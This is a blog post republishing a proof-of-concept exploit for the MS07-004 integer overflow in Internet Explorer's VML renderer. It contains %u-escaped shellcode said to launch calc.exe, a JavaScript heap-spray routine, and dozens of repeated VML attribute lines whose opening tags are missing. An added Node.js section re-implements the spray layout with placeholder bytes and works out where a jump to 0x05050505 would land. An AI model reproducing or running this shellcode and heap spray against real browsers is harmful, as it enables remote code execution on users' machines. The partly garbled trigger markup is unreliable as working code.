MSIE, VML Remote Buffer Overflow Exploit (MS07-004)

A vulnerability has been found in MSIE 7: Microsoft bulletin MS07-004, an integer overflow in the VML renderer (vgx.dll), for which 'lifeasageek at gmail.com' published an exploit. Keep an eye on the updates coming from Microsoft, or use another browser.
All of the JavaScript used is based on the MS06-055 exploit (the earlier VML vulnerability) written by Trirat Puttaraksa (Kira) 'trir00t at gmail.com', slightly modified.

Sample code (the listing survives on this page only partially: the opening tags of the repeated VML elements were lost when the page was rendered, so only their attribute lists remain; the object, style and script parts are intact):

HTML:
  <object id="VMLRender"
    classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
  </object>

  <style> v\:* { behavior: url(#VMLRender); } </style>
  <script language="javascript">
  // The page's original shellcode, unchanged: %u-escaped UTF-16 units; the trailing
  // bytes spell "calc", i.e. a calc.exe-launching payload
  shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

  // Heap spray: grow a block of 0x0505 filler (0x05050505 in memory doubles as a
  // pointer into the spray and as an x86 "add eax, imm32" sled) until
  // block + 20 bytes of string-header slack + shellcode fills exactly 0x40000
  // UTF-16 units, then allocate 350 copies of block + shellcode
  bigblock = unescape("%u0505%u0505");
  headersize = 20;
  slackspace = headersize + shellcode.length;
  while (bigblock.length < slackspace) bigblock += bigblock;
  fillblock = bigblock.substring(0, slackspace);
  block = bigblock.substring(0, bigblock.length - slackspace);
  while (block.length + slackspace < 0x40000) block = block + block + fillblock;
  memory = new Array();
  for (i = 0; i < 350; i++) memory[i] = block + shellcode;
  </script>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>

  lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
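The heap-spray arithmetic in the script above is what makes the exploit land: every sprayed string is grown so that, with 20 bytes of slack for the string header, it fills exactly 0x40000 UTF-16 units, and the 0x0505 filler is chosen so that the value 0x05050505 both points into the spray and decodes as an x86 sled (`05 05 05 05 05` = `add eax, 0x05050505`). The following is an added example, not code from the original post or its author: it re-implements the spray layout as a function, reports what one sprayed block looks like in memory, and works out where execution would land if a corrupted pointer holding 0x05050505 were jumped to. The placeholder payload, the spray base address (0x02000000) and the 0x80000-byte allocation granularity are assumptions for illustration, not values from the page. It runs under Node.js and touches no browser.

```javascript
// Added example (not from the original post). Reproduces the layout arithmetic of the
// page's heap spray and checks the properties the spray relies on. Node.js only.

const FILLER_UNITS = "\u0505\u0505"; // bytes 05 05 05 05: a pointer into the spray and an x86 "add eax, imm32" sled
const HEADERSIZE = 20;               // slack for the BSTR length prefix / terminator, as in the page's script
const TARGET_UNITS = 0x40000;        // each block is grown until block.length + slackspace == 0x40000 UTF-16 units
const BLOCK_COUNT = 350;             // copies allocated by the page's for-loop

// Constructed placeholder payload: 64 UTF-16 units (128 bytes) of NOPs, NOT the page's shellcode.
const DEMO_SHELLCODE = "\u9090".repeat(64);

// Same algorithm as the page's script, parameterised so the result can be inspected.
function buildSpray(shellcode, headersize = HEADERSIZE, targetUnits = TARGET_UNITS, count = BLOCK_COUNT) {
  let bigblock = FILLER_UNITS;
  const slackspace = headersize + shellcode.length;
  // Double the filler until it can hold header + shellcode; bigblock.length stays a power of two
  while (bigblock.length < slackspace) bigblock += bigblock;
  const fillblock = bigblock.substring(0, slackspace);
  let block = bigblock.substring(0, bigblock.length - slackspace);
  // Each round doubles (block.length + slackspace), so it stays a power of two and the
  // loop exits exactly when block.length + slackspace == targetUnits
  while (block.length + slackspace < targetUnits) block = block + block + fillblock;
  const memory = [];
  for (let i = 0; i < count; i++) memory.push(block + shellcode);
  return { block, slackspace, memory };
}

// Describe what one sprayed string looks like in memory.
function layout(shellcode = DEMO_SHELLCODE) {
  const { block, slackspace, memory } = buildSpray(shellcode);
  const unitsPerString = memory[0].length;          // == TARGET_UNITS - HEADERSIZE
  const dataBytes = unitsPerString * 2;             // UTF-16 code units are 2 bytes each
  return {
    invariantHolds: block.length + slackspace === TARGET_UNITS,
    unitsPerString,
    dataBytes,
    bstrBytes: 4 + dataBytes + 2,                   // IE keeps JScript strings as BSTRs: 4-byte length prefix + data + 2-byte NUL
    shellcodeOffsetBytes: 4 + block.length * 2,     // byte offset of the payload inside the BSTR
    allSameLength: memory.every(s => s.length === unitsPerString),
    copies: memory.length,
  };
}

// If a corrupted pointer holds `target` and is jumped to, where does execution land?
// ASSUMPTIONS (not from the page): every sprayed string occupies its own chunkBytes-sized
// chunk, and the first chunk starts at sprayBase.
function landing(target, shellcode = DEMO_SHELLCODE, sprayBase = 0x02000000, chunkBytes = 0x80000) {
  const info = layout(shellcode);
  const sprayEnd = sprayBase + chunkBytes * info.copies;
  if (target < sprayBase || target >= sprayEnd) return { inSpray: false };
  const rel = target - sprayBase;
  const offsetInChunk = rel % chunkBytes;
  const inFiller = offsetInChunk >= 4 && offsetInChunk < info.shellcodeOffsetBytes;
  const bytesToShellcode = inFiller ? info.shellcodeOffsetBytes - offsetInChunk : null;
  return {
    inSpray: true,
    chunkIndex: Math.floor(rel / chunkBytes),
    offsetInChunk,
    inFiller,                                       // any landing inside the filler slides down the sled
    bytesToShellcode,
    // "add eax, imm32" is 5 bytes; if the remaining filler is not a multiple of 5 the last
    // add swallows the first bytes of the payload, a known weakness of a 0x05 sled
    sledAligned: inFiller ? bytesToShellcode % 5 === 0 : null,
  };
}

function main() {
  console.log("layout of one sprayed string:", layout());
  console.log("jump to 0x05050505 lands at:", landing(0x05050505));
  console.log("jump outside the spray:", landing(0x01000000));
}

main();
```

With the 64-unit placeholder every string is 0x40000 - 20 = 262124 code units, i.e. a 524254-byte BSTR with the payload at byte offset 524124, so each copy sits in its own 512 KB size class and the payload ends up at the same offset in every chunk. Under the assumed base address, 0x05050505 falls 0x50505 bytes into chunk 96, well inside the filler, but 195159 bytes short of the payload, which is not a multiple of 5: the page's script does nothing to align the sled, so whether the last `add` eats the first shellcode bytes depends on where the allocator actually places the spray.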

One Response to “MSIE, VML Remote Buffer Overflow Exploit (MS07-004)”

  1. 17/01/07 at 22:06

    raca using Opera 9.10 on Windows XP says:

    Just use lynx! Or better don't use the 'tubes'.
